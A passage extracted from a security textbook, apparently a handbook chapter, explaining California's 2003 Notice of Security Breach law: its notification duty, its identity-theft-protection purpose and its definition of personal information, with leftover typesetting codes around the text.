P1: GDZ/SPH
[…] California Information Practices Act California passed a unique law, effective July 1, 2003, requiring notification of security breaches. An amendment to the California Information Practices Act (2003), and titled Notice of Security Breach, the law requires any business or California state agency that maintains unencrypted computerized data that include personal information to notify any California resident of a security breach involving his or her personal information (CA Civil Code §§1798.29 and 1798.82–1798.84). The purpose of the law is to give affected individuals the opportunity to take steps to protect themselves from identity theft. Under the California Act, personal information refers to “an individual’s first name or first initial and last name in combination with any one or more of the following data elements, when either the name or the data elements are not encrypted” (CA Civil Code §1798.82(e)): r r
Social Security number. Driver’s license number or California identification card number.
P1: IML/FFX
P2: IML/FFX
JWBS001B-79.tex
142 r
QC: IML/FFX
WL041/Bidgoli
T1: IML
WL041-Bidgoli.cls
October 17, 2005
12:20
Char Count= 0